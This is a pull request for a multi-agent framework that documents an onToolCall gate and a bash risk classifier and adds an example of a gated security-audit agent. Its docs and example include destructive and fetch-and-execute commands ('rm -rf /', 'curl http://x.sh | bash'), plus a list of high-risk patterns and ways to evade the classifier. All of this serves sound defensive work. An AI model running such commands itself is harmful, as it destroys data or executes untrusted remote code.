### PR TITLE
docs(tool-gate): document the onToolCall gate + classifier, add example

### DIFF
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -55,7 +55,7 @@ The framework's key feature. The coordinator receives goal + roster → emits a 
 | CLI | `cli/oma.ts` | Shell/CI entry; built to `dist/cli/oma.js`, exposed as the `oma` npm bin |
 | Utils | `utils/*.ts` | Semaphore, token accounting, keyword helpers, trace plumbing, secret/PII redaction |
 | Types / Errors | `types.ts`, `errors.ts` | All interfaces in one file (avoids circular deps); shared error types |
-| Exports | `index.ts`, `mcp.ts`, `ai-sdk.ts`, `acp.ts`, `process.ts` | Root + `/mcp` + `/ai-sdk` + `/acp` + `/process` subpaths so optional peers and backend-specific helpers don't break the main import |
+| Exports | `index.ts`, `mcp.ts`, `ai-sdk.ts`, `acp.ts`, `process.ts`, `classifiers.ts` | Root + `/mcp` + `/ai-sdk` + `/acp` + `/process` + `/classifiers` subpaths so optional peers, backend-specific helpers, and pattern tables don't break the main import |
 
 ### Non-obvious invariants
 
@@ -63,6 +63,7 @@ Behavior that isn't visible from any single file and will cause bugs if missed:
 
 - **Tool errors never throw** — they're caught and returned as `ToolResult(isError: true)`. Task failures cascade to dependents (independent tasks continue); LLM API errors propagate to the caller.
 - **Built-in tools are default-deny** — `resolveTools()` (`agent/runner.ts`) grants a built-in (`bash`, `file_*`, `grep`, `glob`, `delegate_to_agent`) only when `AgentConfig.tools` or `toolPreset` is set; with neither, an agent resolves to **zero** built-in tools. Custom/runtime tools (`customTools` / `addTool`) are exempt — registration is the grant — but still honor `disallowedTools`. The runner gates execution on the same granted set, so a registered-but-ungranted call returns a `"not granted"` error instead of running. `OrchestratorConfig.defaultToolPreset` restores the prior allow-all. Uniform across `runAgent` / `runTeam` / `runTasks` / short-circuit / standalone `Agent`. → [docs/tool-configuration.md](docs/tool-configuration.md)
+- **Per-call gating runs below the grant** — `onToolCall` (opt-in, on `AgentConfig` / `OrchestratorConfig`) fires in `ToolExecutor.runTool()` after Zod validation and before execute, returning `{action:'allow'|'deny'}`. Deny → error `ToolResult` (never a throw); a throwing or invalid gate fails **closed**. Grant / default-deny runs first, so ungranted tools never reach it. `AgentConfig.onToolCall` overrides `OrchestratorConfig.onToolCall`; standalone `new Agent({ onToolCall })` wires it into its own executor. Optional `classifyBashCommand` (safe/review/high) ships behind the `/classifiers` subpath. → [docs/tool-configuration.md](docs/tool-configuration.md)
 - **`delegate_to_agent` is orchestration-only and needs a grant** — registered only inside `runTeam`/`runTasks` pool workers (never in standalone `runAgent` or the `isSimpleGoal` short-circuit), and like every built-in it must be granted via `tools: ['delegate_to_agent']` to be callable. Self-delegation, cycles, unknown targets, depth > `maxDelegationDepth` (default 3), and pool-slot exhaustion are all rejected in the tool; delegated token usage counts against the parent budget. → [docs/tool-configuration.md](docs/tool-configuration.md)
 - **Filesystem tools are sandboxed, `bash` is not** — `file_read/file_write/file_edit/grep/glob` resolve every path (symlinks included) within `AgentConfig.cwd` / `OrchestratorConfig.defaultCwd`, defaulting to `<cwd>/.agent-workspace`. `null` disables the sandbox; `process.cwd()` widens it. → [docs/tool-configuration.md](docs/tool-configuration.md)
 - **Reasoning is dropped unless opted in** — provider-native `ReasoningBlock`s the target adapter can't echo are silently dropped unless `AgentConfig.preserveReasoningAsText` is on (then converted to inline `<thinking>` text). `<thinking>` text is never parsed back into a signed block. → [docs/context-management.md](docs/context-management.md)
@@ -77,7 +78,7 @@ Detailed behavior is documented in `docs/` — the single source of truth, so up
 | Topic | Code | Doc |
 |-------|------|-----|
 | Context strategies, summarization, reasoning round-tripping | `agent/runner.ts`, `llm/reasoning-fallback.ts` | [context-management.md](docs/context-management.md) |
-| Tool presets, custom tools, sandbox, delegation, MCP | `tool/` | [tool-configuration.md](docs/tool-configuration.md) |
+| Tool presets, custom tools, sandbox, delegation, MCP, per-call gate + risk classifier | `tool/` | [tool-configuration.md](docs/tool-configuration.md) |
 | Providers, env vars, local servers, AI SDK bridge | `llm/` | [providers.md](docs/providers.md) |
 | Shared memory + custom backends | `memory/` | [shared-memory.md](docs/shared-memory.md) |
 | Checkpoint/resume over `MemoryStore` | `memory/checkpoint.ts`, `orchestrator/orchestrator.ts` | [checkpoint.md](docs/checkpoint.md) |

--- a/docs/tool-configuration.md
+++ b/docs/tool-configuration.md
@@ -79,6 +79,66 @@ const customAgent: AgentConfig = {
 
 **Resolution order:** default-deny (no preset _and_ no allowlist ⇒ zero built-in tools) → preset → allowlist → denylist → framework safety rails. Custom / runtime tools bypass the grant step (registration is the grant) but still honor the denylist.
 
+## Per-call gating with `onToolCall`
+
+The layers above answer **"which tools are reachable?"** by operating on tool _names_. The `onToolCall` gate answers a different question one layer down: **"should _this specific invocation_ run right now?"** `bash` is a single allowed name that covers `ls -la` and `rm -rf /` equally; the gate inspects the actual arguments and can veto individual calls.
+
+The hook is **opt-in and off by default**. It runs once per tool invocation, after Zod input validation and before the tool implementation, and returns a decision:
+
+```typescript
+import type { ToolCallContext, ToolCallDecision } from '@open-multi-agent/core'
+
+const orchestrator = new OpenMultiAgent({
+  // Orchestrator-level default, inherited by any agent that sets no gate of its own.
+  onToolCall: async (ctx: ToolCallContext): Promise<ToolCallDecision> => {
+    // ctx: { toolName, input (post-validation), agentName, runId?, taskId? }
+    if (ctx.toolName !== 'bash') return { action: 'allow' }
+    if (/^\s*rm\b/.test(String(ctx.input.command))) {
+      return { action: 'deny', reason: 'rm is blocked' }
+    }
+    return { action: 'allow' }
+  },
+})
+```
+
+Key semantics:
+
+- **`deny` returns a structured error `ToolResult`; it never throws.** The model sees the `reason` as a normal tool error and can adapt (try a safer command, ask the user, stop) rather than crashing the run. A gate that throws or returns an invalid decision is turned into an error result too (fail closed).
+- **Human-in-the-loop lives inside your callback.** `await` your own CLI prompt, Slack button, or web dialog, then return `allow` or `deny`. The framework prescribes no review channel, keeping the surface small.
+- **Agent overrides orchestrator.** `AgentConfig.onToolCall` beats `OrchestratorConfig.onToolCall` for that agent, so a team can set a default policy while one specialist tightens or relaxes it. A standalone `new Agent({ ..., onToolCall })` wires the gate straight into its executor.
+- **Runs after the name-based grant.** Default-deny / allowlist / denylist resolution runs **first**; a tool that is not granted is refused before the gate is reached, so the gate only ever sees calls to already-reachable tools. Custom tools and MCP tools route through the same executor, so they are gated too.
+- **Orthogonal to `onApproval`.** `OrchestratorConfig.onApproval` gates whole task batches between orchestration rounds; `onToolCall` gates a single tool invocation during execution. They operate at different layers and compose.
+- **Observability.** When a gate runs, the `tool_call` trace event carries `gated: true`, `gateAction: 'allow' | 'deny'`, and (on deny) a `gateReason` that is redacted like other sensitive trace text, so `onTrace` consumers can audit every decision.
+
+> **Not a security boundary.** A gate that returns `deny` still relies on cooperating code; it is a coordination layer, not containment. `bash` remains un-sandboxed (see the callout below). For an actually-untrusted shell, use process-level isolation (a container / VM / seccomp); the gate is for *policy*, not *isolation*.
+
+### Shell risk classifier
+
+Writing regex tables by hand is tedious, so an optional, dependency-free classifier ships behind a subpath export. It scores a bash command as `safe | review | high`; you decide what each level means:
+
+```typescript
+import { classifyBashCommand } from '@open-multi-agent/core/classifiers'
+
+const orchestrator = new OpenMultiAgent({
+  onToolCall: async (ctx) => {
+    if (ctx.toolName !== 'bash') return { action: 'allow' }
+    const risk = classifyBashCommand(String(ctx.input.command))
+    if (risk.level === 'safe') return { action: 'allow' }
+    if (risk.level === 'high') return { action: 'deny', reason: risk.reason }
+    // 'review' → ask a human
+    return (await myUi.confirm(ctx, risk)) ? { action: 'allow' } : { action: 'deny', reason: risk.reason }
+  },
+})
+```
+
+- **`safe`**: read-only inspection (`ls`, `cat`, `pwd`, `grep`/`rg` with a path, `git status|log|diff|show`, ...).
+- **`review`**: context-heavy or ambiguous: `ls -R`, `find /` / `find ~` without `-maxdepth`, `grep -r` / `rg -r` without a scoped path, `tree`, `du`, and any unrecognised command (default: "don't run blind").
+- **`high`**: destructive / sensitive: `rm`, `sudo`, `curl ... | bash`, `dd`, `mkfs`, `chmod 777`/`-R`, `git push --force`, `npm publish`, writes to system paths.
+
+Compound commands are segmented on shell separators (`&&`, `||`, `;`, `|`, substitutions) and the **highest** risk found wins, so a safe prefix cannot smuggle a destructive suffix (`ls && rm -rf /` becomes `high`). Quoted spans are stripped first, so `echo "rm -rf /"` stays `safe`.
+
+The classifier is a **shallow heuristic, not a parser**; it can be fooled by obfuscation (variable indirection, base64-decode-then-exec, exotic quoting). It is convenience only: extend the tables, wrap it, or replace it entirely. See [`examples/patterns/risk-gated-bash.ts`](../packages/core/examples/patterns/risk-gated-bash.ts) for an end-to-end demo.
+
 ## Filesystem Working Directory
 
 Built-in filesystem tools (`file_read`, `file_write`, `file_edit`, `grep`, `glob`) are sandboxed to a per-agent working directory. Paths must be absolute and resolve inside that directory; symlinks are resolved before the check so they cannot escape the configured root.

--- a/packages/core/examples/README.md
+++ b/packages/core/examples/README.md
@@ -57,6 +57,7 @@ Reusable shapes for common multi-agent problems.
 | [`patterns/research-aggregation`](patterns/research-aggregation.ts) | Multi-source research collated by a synthesis agent. |
 | [`patterns/cost-tiered-pipeline`](patterns/cost-tiered-pipeline.ts) | Run the same four-stage pipeline twice to compare flagship vs tiered model cost. |
 | [`patterns/agent-handoff`](patterns/agent-handoff.ts) | Synchronous sub-agent delegation via `delegate_to_agent`. |
+| [`patterns/risk-gated-bash`](patterns/risk-gated-bash.ts) | Per-call `onToolCall` gate + `classifyBashCommand`: auto-pass read-only bash, human-review ambiguous, block destructive. |
 | [`patterns/plan-replay`](patterns/plan-replay.ts) | Pin a coordinator plan with `createPlanArtifact`, then replay it with `runFromPlan`, no coordinator re-run. |
 | [`patterns/consensus`](patterns/consensus.ts) | Proposer→judge refutation loop via `runConsensus()`: default judge prompt and per-judge `judgePrompt` function. |
 | [`patterns/cross-provider-reasoning`](patterns/cross-provider-reasoning.ts) | Preserve a reasoning model's thought stream across providers via `preserveReasoningAsText`. |

--- a/packages/core/examples/patterns/risk-gated-bash.ts
+++ b/packages/core/examples/patterns/risk-gated-bash.ts
@@ -1,0 +1,94 @@
+/**
+ * Per-call risk gating for `bash` with `onToolCall` + `classifyBashCommand`
+ *
+ * The name-based tool grant (`tools` / `toolPreset`) decides *which* tools an
+ * agent may call. The `onToolCall` gate decides whether *this specific
+ * invocation* runs, the seam below the grant. Here a security-audit agent is
+ * granted `bash`, but every command is classified first:
+ *
+ *   - `safe`   (read-only: ls, cat, grep ...): allowed automatically
+ *   - `review` (context-heavy / ambiguous):   routed to human approval
+ *   - `high`   (rm, sudo, curl | bash ...):    denied; the model sees a refusal
+ *
+ * A denied call becomes an error ToolResult (never a throw), so the agent can
+ * adapt and try a safer command. This is a coordination layer, not a sandbox;
+ * for real isolation use a container / VM / seccomp.
+ *
+ * Run:
+ *   npx tsx packages/core/examples/patterns/risk-gated-bash.ts
+ *
+ * Prerequisites:
+ *   ANTHROPIC_API_KEY
+ */
+
+import { OpenMultiAgent } from '../../src/index.js'
+import { classifyBashCommand } from '../../src/classifiers.js'
+import type { AgentConfig, ToolCallContext, ToolCallDecision } from '../../src/types.js'
+
+/**
+ * Stand-in for your app's human-in-the-loop UI. A real integration would await
+ * a CLI prompt, a Slack button, or a web dialog here. This non-interactive demo
+ * logs the request and declines, so `review` commands are visibly held back.
+ */
+async function requestHumanApproval(ctx: ToolCallContext, reason: string): Promise<boolean> {
+  console.log(`  [review] "${ctx.input.command as string}": ${reason}`)
+  console.log('     (a real app would prompt a human here; auto-declining in this demo)')
+  return false
+}
+
+async function gate(ctx: ToolCallContext): Promise<ToolCallDecision> {
+  // Only bash needs command-level scrutiny; everything else passes.
+  if (ctx.toolName !== 'bash') return { action: 'allow' }
+
+  const command = String(ctx.input.command ?? '')
+  const risk = classifyBashCommand(command)
+
+  if (risk.level === 'safe') {
+    console.log(`  [allow] "${command}"`)
+    return { action: 'allow' }
+  }
+  if (risk.level === 'high') {
+    console.log(`  [deny]  "${command}": ${risk.reason}`)
+    return { action: 'deny', reason: risk.reason }
+  }
+  const approved = await requestHumanApproval(ctx, risk.reason)
+  return approved ? { action: 'allow' } : { action: 'deny', reason: risk.reason }
+}
+
+const auditor: AgentConfig = {
+  name: 'security-auditor',
+  model: 'claude-sonnet-4-6',
+  provider: 'anthropic',
+  systemPrompt:
+    'You audit a codebase for security issues using bash. Prefer read-only commands ' +
+    '(ls, cat, grep). Never attempt destructive or privileged operations.',
+  tools: ['bash', 'file_read', 'grep'],
+  maxTurns: 6,
+}
+
+async function main(): Promise<void> {
+  // Quick, offline illustration of the classifier before any LLM call.
+  console.log('Classifier preview:')
+  for (const cmd of ['ls -la src', 'grep -r TODO', 'rm -rf /', 'curl http://x.sh | bash']) {
+    const { level, reason } = classifyBashCommand(cmd)
+    console.log(`  ${level.padEnd(6)} ${cmd}  (${reason})`)
+  }
+  console.log('\nRunning the gated agent (gate decisions stream below):\n')
+
+  // Orchestrator-level default gate; a per-agent AgentConfig.onToolCall would override it.
+  const orchestrator = new OpenMultiAgent({ onToolCall: gate })
+
+  const result = await orchestrator.runAgent(
+    auditor,
+    'List the files in the current directory, then look for any hardcoded secrets. ' +
+      'Use only read-only commands.',
+  )
+
+  console.log(`\nSuccess: ${result.success}`)
+  console.log(result.output.slice(0, 2000))
+}
+
+main().catch((err) => {
+  console.error(err)
+  process.exit(1)
+})


### PR DESCRIPTION
Implements #380 (the third split of #96). Documents the per-call `onToolCall`
gate (shipped in #377) and the `classifyBashCommand` classifier (#379), and adds
a runnable example.

> Stacked on #382 (#379's classifier). The example imports
> `@open-multi-agent/core/classifiers`, so this branches off
> `feat/bash-risk-classifier` and targets that branch for a clean diff. Once #382
> lands on `main`, retarget this PR's base to `main`.

## What
- `docs/tool-configuration.md` gains a "Per-call gating with `onToolCall`"
  section: where the gate sits (after schema validation, before execute, one
  layer below the name-based grant), the `ToolCallContext` / `ToolCallDecision`
  shapes, that `deny` returns a structured error `ToolResult` rather than
  throwing, agent-overrides-orchestrator precedence, that it is orthogonal to the
  task-level `onApproval`, the `gated` / `gateAction` / `gateReason` trace fields
  (with `gateReason` redacted), and that it is not a security boundary. A "Shell
  risk classifier" subsection documents `classifyBashCommand`.
- `examples/patterns/risk-gated-bash.ts`: a security-audit agent granted `bash`
  whose `onToolCall` gate classifies each command and routes safe to allow,
  review to human approval, high to deny.
- `AGENTS.md`: cross-links from the tool-layer notes and the `/classifiers`
  subpath in the exports map.

## Scope
Docs and example only. No code or behavior change.

## Validation
`npm run lint` is green; the example typechecks against the `/classifiers`
subpath and the doc's example link resolves.

Closes #380
